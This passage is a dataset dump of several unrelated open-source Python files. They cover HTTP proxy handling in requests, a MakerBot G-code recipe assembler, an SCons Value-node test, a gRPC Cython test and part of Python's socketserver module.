:param proxies: A dictionary of schemes to proxy URLs.
"""
proxies = proxies or {}
proxy = proxies.get(urlparse(request.url).scheme)
if proxy:
url, _ = urldefrag(request.url)
else:
url = request.path_url
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. Currently this adds a
Proxy-Authorization header.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
proxies = kwargs.get('proxies', {})
if proxies is None:
proxies = {}
proxy = proxies.get(urlparse(request.url).scheme)
username, password = get_auth_from_url(proxy)
if username and password:
# Proxy auth usernames and passwords will be urlencoded, we need
# to decode them.
username = unquote(username)
password = unquote(password)
request.headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) The timeout on the request.
:param verify: (optional) Whether to verify SSL certificates.
:param vert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request, proxies=proxies)
chunked = not (request.body is None or 'Content-Length' in request.headers)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=timeout)
low_conn.putrequest(request.method, url, skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except socket.error as sockerr:
raise ConnectionError(sockerr)
except MaxRetryError as e:
raise ConnectionError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e)
elif isinstance(e, TimeoutError):
raise Timeout(e)
else:
raise
r = self.build_response(request, resp)
if not stream:
r.content
return r
| mit |
abinashk-inf/AstroBox | src/ext/makerbot_driver/GcodeAssembler.py | 6 | 7063 | from __future__ import absolute_import
import json
import makerbot_driver
"""
A machine profile object that holds all values for a specific profile.
"""
import json
import os
import re
import logging
GcodeRecipes = {
"PLA" : {
"print_start_sequence" : {
"heat_platform" : "no_heat"
},
"print_end_sequence" : {
"cool_platform" : "no_cool"
},
"variables" : {
"TOOL_0_TEMP" : 230,
"TOOL_1_TEMP" : 230
}
},
"ABS" : {
"print_start_sequence" : {
"heat_platform" : "heat_platform"
},
"print_end_sequence" : {
"cool_platform" : "cool_platform"
},
"variables" : {
"TOOL_0_TEMP" : 230,
"TOOL_1_TEMP" : 230,
"PLATFORM_TEMP" : 110
}
},
"dualstrusion": {
"print_start_sequence" : {
"heat_tools" : "dualstrusion"
},
"print_end_sequence" : {
"cool_tools" : "dualstrusion"
},
"variables" : {}
}
}
class GcodeAssembler(object):
"""
An assembler that builds start and end gcodes.
In makerbot_driver/profiles/recipes.json there are
several recipes defined, each with a set of routines.
"""
def __init__(self, machine_profile, profiledir=None):
self.machine_profile = machine_profile
self.start_order = [
'begin_print',
'homing',
'start_position',
'heat_platform',
'heat_tools',
'end_start_sequence',
]
self.end_order = [
'end_position',
'cool_platform',
'cool_tools',
'end_print',
]
self.recipes = GcodeRecipes
def assemble_recipe(self,
material='PLA',
tool_0=True,
tool_1=False,
begin_print='replicator_begin',
homing='replicator_homing',
start_position='replicator_start_position',
end_start_sequence='replicator_end_start_sequence',
end_position='replicator_end_position',
end_print='replicator_end',
heat_platform_override=False,
no_heat_platform_override=False,
):
"""
The recipe assembler. Has several built in
defaults a user could use to create a generic
sequence recipe. If both tool_0 and tool_1 are
set to true, will assume it should output in
dualstrusion mode.
@return dict start_recipe: The recipe used to
build the print start sequence.
@return dict end_recipe: The recipe used to
build the print end sequence.
@return dict variables: The default variables
used by the gcode parser.
"""
start_recipe = {}
end_recipe = {}
variables = {}
#Check for dualstrusion
if tool_0 and tool_1:
dual_start_recipe, dual_end_recipe, dual_variables = self.get_recipes_and_variables('dualstrusion')
start_recipe.update(dual_start_recipe)
end_recipe.update(dual_end_recipe)
variables.update(dual_variables)
elif tool_0:
#Update start routine
start_recipe.update({'heat_tools': 'heat_0'})
#Update end routine
end_recipe.update({'cool_tools': 'cool_0'})
elif tool_1:
#Update start routine
start_recipe.update({'heat_tools': 'heat_1'})
#Update end routine
end_recipe.update({'cool_tools': 'cool_1'})
#Add material values to the return template values
mat_start_recipe, mat_end_recipe, mat_variables = self.get_recipes_and_variables(material)
start_recipe.update(mat_start_recipe)
end_recipe.update(mat_end_recipe)
variables.update(mat_variables)
start_recipe.update({
'begin_print': begin_print,
'homing': homing,
'start_position': start_position,
'end_start_sequence': end_start_sequence,
})
end_recipe.update({
'end_position': end_position,
'end_print': end_print
})
if heat_platform_override:
start_recipe.update({'heat_platform': 'heat_platform'})
end_recipe.update({'cool_platform': 'cool_platform'})
if no_heat_platform_override:
start_recipe.update({'heat_platform': None})
end_recipe.update({'cool_platform': None})
return start_recipe, end_recipe, variables
def assemble_start_sequence(self, recipe):
"""
Given a start recipe, assembles the correct sequence
@param recipe: The recipe used to create the sequence
@return list gcodes: Sequence of gcodes derived from the recipe
"""
order = self.start_order
template_name = 'print_start_sequence'
gcodes = self.assemble_sequence_from_recipe(
recipe, template_name, order)
return gcodes
def assemble_end_sequence(self, recipe):
"""
Given an end recipe, assembles the correct sequence
@param recipe: The recipe used to create the sequence
@return list gcodes: Sequence of gcodes derived from the recipe
"""
order = self.end_order
template_name = 'print_end_sequence'
gcodes = self.assemble_sequence_from_recipe(
recipe, template_name, order)
return gcodes
def assemble_sequence_from_recipe(self, recipe, template_name, order):
"""
Given a recipe, template_name and ordering creates the correct
sequence.
@param recipe: The recipe used to create the sequence
@param template_name: The name of the template we want to use (start/end)
@param order: The correct ordering of routines
@return list gcodes: Sequence of gcodes derived from the recipe.
"""
gcodes = []
template = self.machine_profile.values[template_name]
for routine in order:
if recipe[routine] is not None:
gcodes.extend(template[routine][recipe[routine]])
return gcodes
def get_recipes_and_variables(self, key):
"""
Given a recipe (i.e. PLA, ABS, dualstrusion), gets its start
routines, end routines and variables.
@param key: Name of the recipe we want to access
@return dict start_routines: The start routines associated with this key
@return dict end_routines: The end routines associated with this key
@return dict variables: The variables associated with this key
"""
if not key in self.recipes:
raise makerbot_driver.RecipeNotFoundError
values = self.recipes[key]
start_routines = values['print_start_sequence']
end_routines = values['print_end_sequence']
variables = values['variables']
return start_routines, end_routines, variables
| agpl-3.0 |
datalogics-robb/scons | test/Value.py | 2 | 4889 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import os
import re
import string
import sys
import TestSCons
import TestCmd
_python_ = TestSCons._python_
test = TestSCons.TestSCons(match=TestCmd.match_re)
# Run all of the tests with both types of source signature
# to make sure there's no difference in behavior.
for source_signature in ['MD5', 'timestamp']:
print "Testing Value node with source signatures:", source_signature
test.write('SConstruct', """
SourceSignatures(r'%(source_signature)s')
class Custom:
def __init__(self, value): self.value = value
def __str__(self): return "C=" + str(self.value)
P = ARGUMENTS.get('prefix', '/usr/local')
L = len(P)
C = Custom(P)
def create(target, source, env):
open(str(target[0]), 'wb').write(source[0].get_contents())
env = Environment()
env['BUILDERS']['B'] = Builder(action = create)
env['BUILDERS']['S'] = Builder(action = '%(_python_)s put $SOURCES into $TARGET')
env.B('f1.out', Value(P))
env.B('f2.out', env.Value(L))
env.B('f3.out', Value(C))
env.S('f4.out', Value(L))
def create_value (target, source, env):
target[0].write(source[0].get_contents ())
def create_value_file (target, source, env):
open(str(target[0]), 'wb').write(source[0].read())
env['BUILDERS']['B2'] = Builder(action = create_value)
env['BUILDERS']['B3'] = Builder(action = create_value_file)
V = Value('my value')
env.B2(V, 'f3.out')
env.B3('f5.out', V)
""" % locals())
test.write('put', """
import os
import string
import sys
open(sys.argv[-1],'wb').write(string.join(sys.argv[1:-2]))
""")
test.run(arguments='-c')
test.run()
out7 = """create_value(["'my value'"], ["f3.out"])"""
out8 = """create_value_file(["f5.out"], ["'my value'"])"""
out1 = """create(["f1.out"], ["'/usr/local'"])"""
out2 = """create(["f2.out"], ["10"])"""
out3 = """create\\(\\["f3.out"\\], \\["<.*.Custom instance at """
#" <- unconfuses emacs syntax highlighting
test.fail_test(string.find(test.stdout(), out1) == -1)
test.fail_test(string.find(test.stdout(), out2) == -1)
test.fail_test(string.find(test.stdout(), out7) == -1)
test.fail_test(string.find(test.stdout(), out8) == -1)
test.fail_test(re.search(out3, test.stdout()) == None)
test.must_match('f1.out', "/usr/local")
test.must_match('f2.out', "10")
test.must_match('f3.out', "C=/usr/local")
test.must_match('f4.out', '10')
test.must_match('f5.out', "C=/usr/local")
test.up_to_date(arguments='.')
test.run(arguments='prefix=/usr')
out4 = """create(["f1.out"], ["'/usr'"])"""
out5 = """create(["f2.out"], ["4"])"""
out6 = """create\\(\\["f3.out"\\], \\["<.*.Custom instance at """
#" <- unconfuses emacs syntax highlighting
test.fail_test(string.find(test.stdout(), out4) == -1)
test.fail_test(string.find(test.stdout(), out5) == -1)
test.fail_test(re.search(out6, test.stdout()) == None)
test.must_match('f1.out', "/usr")
test.must_match('f2.out', "4")
test.must_match('f3.out', "C=/usr")
test.must_match('f4.out', '4')
test.up_to_date('prefix=/usr', '.')
test.unlink('f3.out')
test.run(arguments='prefix=/var')
out4 = """create(["f1.out"], ["'/var'"])"""
test.fail_test(string.find(test.stdout(), out4) == -1)
test.fail_test(string.find(test.stdout(), out5) != -1)
test.fail_test(string.find(test.stdout(), out7) == -1)
test.fail_test(string.find(test.stdout(), out8) == -1)
test.fail_test(re.search(out6, test.stdout()) == None)
test.up_to_date('prefix=/var', '.')
test.must_match('f1.out', "/var")
test.must_match('f2.out', "4")
test.must_match('f3.out', "C=/var")
test.must_match('f4.out', "4")
test.must_match('f5.out', "C=/var")
test.pass_test()
| mit |
baylabs/grpc | src/python/grpcio_tests/tests/unit/_cython/_read_some_but_not_all_responses_test.py | 21 | 11192 | # Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Test a corner-case at the level of the Cython API."""
import threading
import unittest
from grpc._cython import cygrpc
_INFINITE_FUTURE = cygrpc.Timespec(float('+inf'))
_EMPTY_FLAGS = 0
_EMPTY_METADATA = cygrpc.Metadata(())
class _ServerDriver(object):
def __init__(self, completion_queue, shutdown_tag):
self._condition = threading.Condition()
self._completion_queue = completion_queue
self._shutdown_tag = shutdown_tag
self._events = []
self._saw_shutdown_tag = False
def start(self):
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events.append(event)
self._condition.notify()
if event.tag is self._shutdown_tag:
self._saw_shutdown_tag = True
break
thread = threading.Thread(target=in_thread)
thread.start()
def done(self):
with self._condition:
return self._saw_shutdown_tag
def first_event(self):
with self._condition:
while not self._events:
self._condition.wait()
return self._events[0]
def events(self):
with self._condition:
while not self._saw_shutdown_tag:
self._condition.wait()
return tuple(self._events)
class _QueueDriver(object):
def __init__(self, condition, completion_queue, due):
self._condition = condition
self._completion_queue = completion_queue
self._due = due
self._events = []
self._returned = False
def start(self):
def in_thread():
while True:
event = self._completion_queue.poll()
with self._condition:
self._events.append(event)
self._due.remove(event.tag)
self._condition.notify_all()
if not self._due:
self._returned = True
return
thread = threading.Thread(target=in_thread)
thread.start()
def done(self):
with self._condition:
return self._returned
def event_with_tag(self, tag):
with self._condition:
while True:
for event in self._events:
if event.tag is tag:
return event
self._condition.wait()
def events(self):
with self._condition:
while not self._returned:
self._condition.wait()
return tuple(self._events)
class ReadSomeButNotAllResponsesTest(unittest.TestCase):
def testReadSomeButNotAllResponses(self):
server_completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(cygrpc.ChannelArgs([]))
server.register_completion_queue(server_completion_queue)
port = server.add_http2_port(b'[::]:0')
server.start()
channel = cygrpc.Channel('localhost:{}'.format(port).encode(),
cygrpc.ChannelArgs([]))
server_shutdown_tag = 'server_shutdown_tag'
server_driver = _ServerDriver(server_completion_queue,
server_shutdown_tag)
server_driver.start()
client_condition = threading.Condition()
client_due = set()
client_completion_queue = cygrpc.CompletionQueue()
client_driver = _QueueDriver(client_condition, client_completion_queue,
client_due)
client_driver.start()
server_call_condition = threading.Condition()
server_send_initial_metadata_tag = 'server_send_initial_metadata_tag'
server_send_first_message_tag = 'server_send_first_message_tag'
server_send_second_message_tag = 'server_send_second_message_tag'
server_complete_rpc_tag = 'server_complete_rpc_tag'
server_call_due = set(
(server_send_initial_metadata_tag, server_send_first_message_tag,
server_send_second_message_tag, server_complete_rpc_tag,))
server_call_completion_queue = cygrpc.CompletionQueue()
server_call_driver = _QueueDriver(server_call_condition,
server_call_completion_queue,
server_call_due)
server_call_driver.start()
server_rpc_tag = 'server_rpc_tag'
request_call_result = server.request_call(server_call_completion_queue,
server_completion_queue,
server_rpc_tag)
client_call = channel.create_call(None, _EMPTY_FLAGS,
client_completion_queue, b'/twinkies',
None, _INFINITE_FUTURE)
client_receive_initial_metadata_tag = 'client_receive_initial_metadata_tag'
client_complete_rpc_tag = 'client_complete_rpc_tag'
with client_condition:
client_receive_initial_metadata_start_batch_result = (
client_call.start_client_batch(
cygrpc.Operations([
cygrpc.operation_receive_initial_metadata(_EMPTY_FLAGS),
]), client_receive_initial_metadata_tag))
client_due.add(client_receive_initial_metadata_tag)
client_complete_rpc_start_batch_result = (
client_call.start_client_batch(
cygrpc.Operations([
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
_EMPTY_FLAGS),
cygrpc.operation_send_close_from_client(_EMPTY_FLAGS),
cygrpc.operation_receive_status_on_client(_EMPTY_FLAGS),
]), client_complete_rpc_tag))
client_due.add(client_complete_rpc_tag)
server_rpc_event = server_driver.first_event()
with server_call_condition:
server_send_initial_metadata_start_batch_result = (
server_rpc_event.operation_call.start_server_batch([
cygrpc.operation_send_initial_metadata(_EMPTY_METADATA,
_EMPTY_FLAGS),
], server_send_initial_metadata_tag))
server_send_first_message_start_batch_result = (
server_rpc_event.operation_call.start_server_batch([
cygrpc.operation_send_message(b'\x07', _EMPTY_FLAGS),
], server_send_first_message_tag))
server_send_initial_metadata_event = server_call_driver.event_with_tag(
server_send_initial_metadata_tag)
server_send_first_message_event = server_call_driver.event_with_tag(
server_send_first_message_tag)
with server_call_condition:
server_send_second_message_start_batch_result = (
server_rpc_event.operation_call.start_server_batch([
cygrpc.operation_send_message(b'\x07', _EMPTY_FLAGS),
], server_send_second_message_tag))
server_complete_rpc_start_batch_result = (
server_rpc_event.operation_call.start_server_batch([
cygrpc.operation_receive_close_on_server(_EMPTY_FLAGS),
cygrpc.operation_send_status_from_server(
cygrpc.Metadata(()), cygrpc.StatusCode.ok,
b'test details', _EMPTY_FLAGS),
], server_complete_rpc_tag))
server_send_second_message_event = server_call_driver.event_with_tag(
server_send_second_message_tag)
server_complete_rpc_event = server_call_driver.event_with_tag(
server_complete_rpc_tag)
server_call_driver.events()
with client_condition:
client_receive_first_message_tag = 'client_receive_first_message_tag'
client_receive_first_message_start_batch_result = (
client_call.start_client_batch(
cygrpc.Operations([
cygrpc.operation_receive_message(_EMPTY_FLAGS),
]), client_receive_first_message_tag))
client_due.add(client_receive_first_message_tag)
client_receive_first_message_event = client_driver.event_with_tag(
client_receive_first_message_tag)
client_call_cancel_result = client_call.cancel()
client_driver.events()
server.shutdown(server_completion_queue, server_shutdown_tag)
server.cancel_all_calls()
server_driver.events()
self.assertEqual(cygrpc.CallError.ok, request_call_result)
self.assertEqual(cygrpc.CallError.ok,
server_send_initial_metadata_start_batch_result)
self.assertEqual(cygrpc.CallError.ok,
client_receive_initial_metadata_start_batch_result)
self.assertEqual(cygrpc.CallError.ok,
client_complete_rpc_start_batch_result)
self.assertEqual(cygrpc.CallError.ok, client_call_cancel_result)
self.assertIs(server_rpc_tag, server_rpc_event.tag)
self.assertEqual(cygrpc.CompletionType.operation_complete,
server_rpc_event.type)
self.assertIsInstance(server_rpc_event.operation_call, cygrpc.Call)
self.assertEqual(0, len(server_rpc_event.batch_operations))
if __name__ == '__main__':
unittest.main(verbosity=2)
| bsd-3-clause |
cnoviello/micropython | tests/bytecode/pylib-tests/socketserver.py | 24 | 24196 | """Generic socket server classes.
This module tries to capture the various aspects of defining a server:
For socket-based servers:
- address family:
- AF_INET{,6}: IP (Internet Protocol) sockets (default)
- AF_UNIX: Unix domain sockets
- others, e.g. AF_DECNET are conceivable (see <socket.h>
- socket type:
- SOCK_STREAM (reliable stream, e.g. TCP)
- SOCK_DGRAM (datagrams, e.g. UDP)
For request-based servers (including socket-based):
- client address verification before further looking at the request
(This is actually a hook for any processing that needs to look
at the request before anything else, e.g. logging)
- how to handle multiple requests:
- synchronous (one request is handled at a time)
- forking (each request is handled by a new process)
- threading (each request is handled by a new thread)
The classes in this module favor the server type that is simplest to
write: a synchronous TCP/IP server. This is bad class design, but
save some typing. (There's also the issue that a deep class hierarchy
slows down method lookups.)
There are five classes in an inheritance diagram, four of which represent
synchronous servers of four types:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
Note that UnixDatagramServer derives from UDPServer, not from
UnixStreamServer -- the only difference between an IP and a Unix
stream server is the address family, which is simply repeated in both
unix server classes.
Forking and threading versions of each type of server can be created
using the ForkingMixIn and ThreadingMixIn mix-in classes. For
instance, a threading UDP server class is created as follows:
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
The Mix-in class must come first, since it overrides a method defined
in UDPServer! Setting the various member variables also changes
the behavior of the underlying server mechanism.
To implement a service, you must derive a class from
BaseRequestHandler and redefine its handle() method. You can then run
various versions of the service by combining one of the server classes
with your request handler class.
The request handler class must be different for datagram or stream
services. This can be hidden by using the request handler
subclasses StreamRequestHandler or DatagramRequestHandler.
Of course, you still have to use your head!
For instance, it makes no sense to use a forking server if the service
contains state in memory that can be modified by requests (since the
modifications in the child process would never reach the initial state
kept in the parent process and passed to each child). In this case,
you can use a threading server, but you will probably have to use
locks to avoid two requests that come in nearly simultaneous to apply
conflicting changes to the server state.
On the other hand, if you are building e.g. an HTTP server, where all
data is stored externally (e.g. in the file system), a synchronous
class will essentially render the service "deaf" while one request is
being handled -- which may be for a very long time if a client is slow
to read all the data it has requested. Here a threading or forking
server is appropriate.
In some cases, it may be appropriate to process part of a request
synchronously, but to finish processing in a forked child depending on
the request data. This can be implemented by using a synchronous
server and doing an explicit fork in the request handler class
handle() method.
Another approach to handling multiple simultaneous requests in an
environment that supports neither threads nor fork (or where these are
too expensive or inappropriate for the service) is to maintain an
explicit table of partially finished requests and to use select() to
decide which request to work on next (or whether to handle a new
incoming request). This is particularly important for stream services
where each client can potentially be connected for a long time (if
threads or subprocesses cannot be used).
Future work:
- Standard classes for Sun RPC (which uses either UDP or TCP)
- Standard mix-in classes to implement various authentication
and encryption schemes
- Standard framework for select-based multiplexing
XXX Open problems:
- What to do with out-of-band data?
BaseServer:
- split generic "request" functionality out into BaseServer class.
Copyright (C) 2000 Luke Kenneth Casson Leighton <lkcl@samba.org>
example: read entries from a SQL database (requires overriding
get_request() to return a table entry from the database).
entry is processed by a RequestHandlerClass.
"""
# Author of the BaseServer patch: Luke Kenneth Casson Leighton
# XXX Warning!
# There is a test suite for this module, but it cannot be run by the
# standard regression test.
# To run it manually, run Lib/test/test_socketserver.py.
__version__ = "0.4"
import socket
import select
import sys
import os
import errno
try:
import threading
except ImportError:
import dummy_threading as threading
__all__ = ["TCPServer","UDPServer","ForkingUDPServer","ForkingTCPServer",
"ThreadingUDPServer","ThreadingTCPServer","BaseRequestHandler",
"StreamRequestHandler","DatagramRequestHandler",
"ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer","UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
def _eintr_retry(func, *args):
"""restart a system call interrupted by EINTR"""
while True:
try:
return func(*args)
except OSError as e:
if e.errno != errno.EINTR:
raise
class BaseServer:
"""Base class for server classes.
Methods for the caller:
- __init__(server_address, RequestHandlerClass)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you do not use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- server_close()
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- service_actions()
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- allow_reuse_address
Instance variables:
- RequestHandlerClass
- socket
"""
timeout = None
def __init__(self, server_address, RequestHandlerClass):
"""Constructor. May be extended, do not override."""
self.server_address = server_address
self.RequestHandlerClass = RequestHandlerClass
self.__is_shut_down = threading.Event()
self.__shutdown_request = False
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
pass
def serve_forever(self, poll_interval=0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__is_shut_down.clear()
try:
while not self.__shutdown_request:
# XXX: Consider using another file descriptor or
# connecting to the socket to wake this up instead of
# polling. Polling reduces our responsiveness to a
# shutdown request and wastes cpu at all other times.
r, w, e = _eintr_retry(select.select, [self], [], [],
poll_interval)
if self in r:
self._handle_request_noblock()
self.service_actions()
finally:
self.__shutdown_request = False
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will
deadlock.
"""
self.__shutdown_request = True
self.__is_shut_down.wait()
def service_actions(self):
"""Called by the serve_forever() loop.
May be overridden by a subclass / Mixin to implement any code that
needs to be run during the loop.
"""
pass
# The distinction between handling, getting, processing and
# finishing a request is fairly arbitrary. Remember:
#
# - handle_request() is the top-level call. It calls
# select, get_request(), verify_request() and process_request()
# - get_request() is different for stream or datagram sockets
# - process_request() is the place that may fork a new process
# or create a new thread to finish the request
# - finish_request() instantiates the request handler class;
# this constructor will handle the request all by itself
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = _eintr_retry(select.select, [self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def handle_timeout(self):
"""Called if no new request arrives within self.timeout.
Overridden by ForkingMixIn.
"""
pass
def verify_request(self, request, client_address):
"""Verify the request. May be overridden.
Return True if we should proceed with this request.
"""
return True
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.shutdown_request(request)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
pass
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print('-'*40)
print('Exception happened during processing of request from', end=' ')
print(client_address)
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print('-'*40)
class TCPServer(BaseServer):
"""Base class for various socket-based server classes.
Defaults to synchronous IP stream (i.e., TCP).
Methods for the caller:
- __init__(server_address, RequestHandlerClass, bind_and_activate=True)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you don't use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- process_request(request, client_address)
- shutdown_request(request)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- request_queue_size (only for stream sockets)
- allow_reuse_address
Instance variables:
- server_address
- RequestHandlerClass
- socket
"""
address_family = socket.AF_INET
socket_type = socket.SOCK_STREAM
request_queue_size = 5
allow_reuse_address = False
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
self.server_bind()
self.server_activate()
def server_bind(self):
"""Called by constructor to bind the socket.
May be overridden.
"""
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
self.socket.listen(self.request_queue_size)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
self.socket.close()
def fileno(self):
"""Return socket file number.
Interface required by select().
"""
return self.socket.fileno()
def get_request(self):
"""Get the request and client address from the socket.
May be overridden.
"""
return self.socket.accept()
def shutdown_request(self, request):
"""Called to shutdown and close an individual request."""
try:
#explicitly shutdown. socket.close() merely releases
#the socket and waits for GC to perform the actual close.
request.shutdown(socket.SHUT_WR)
except socket.error:
pass #some platforms may raise ENOTCONN here
self.close_request(request)
def close_request(self, request):
"""Called to clean up an individual request."""
request.close()
class UDPServer(TCPServer):
"""UDP server class."""
allow_reuse_address = False
socket_type = socket.SOCK_DGRAM
max_packet_size = 8192
def get_request(self):
data, client_addr = self.socket.recvfrom(self.max_packet_size)
return (data, self.socket), client_addr
def server_activate(self):
# No need to call listen() for UDP.
pass
def shutdown_request(self, request):
# No need to shutdown anything.
self.close_request(request)
def close_request(self, request):
# No need to close anything.
pass
class ForkingMixIn:
"""Mix-in class to handle each request in a new process."""
timeout = 300
active_children = None
max_children = 40
def collect_children(self):
"""Internal routine to wait for children that have exited."""
if self.active_children is None: return
while len(self.active_children) >= self.max_children:
# XXX: This will wait for any child process, not just ones
# spawned by this library. This could confuse other
# libraries that expect to be able to wait for their own
# children.
try:
pid, status = os.waitpid(0, 0)
except os.error:
pid = None
if pid not in self.active_children: continue
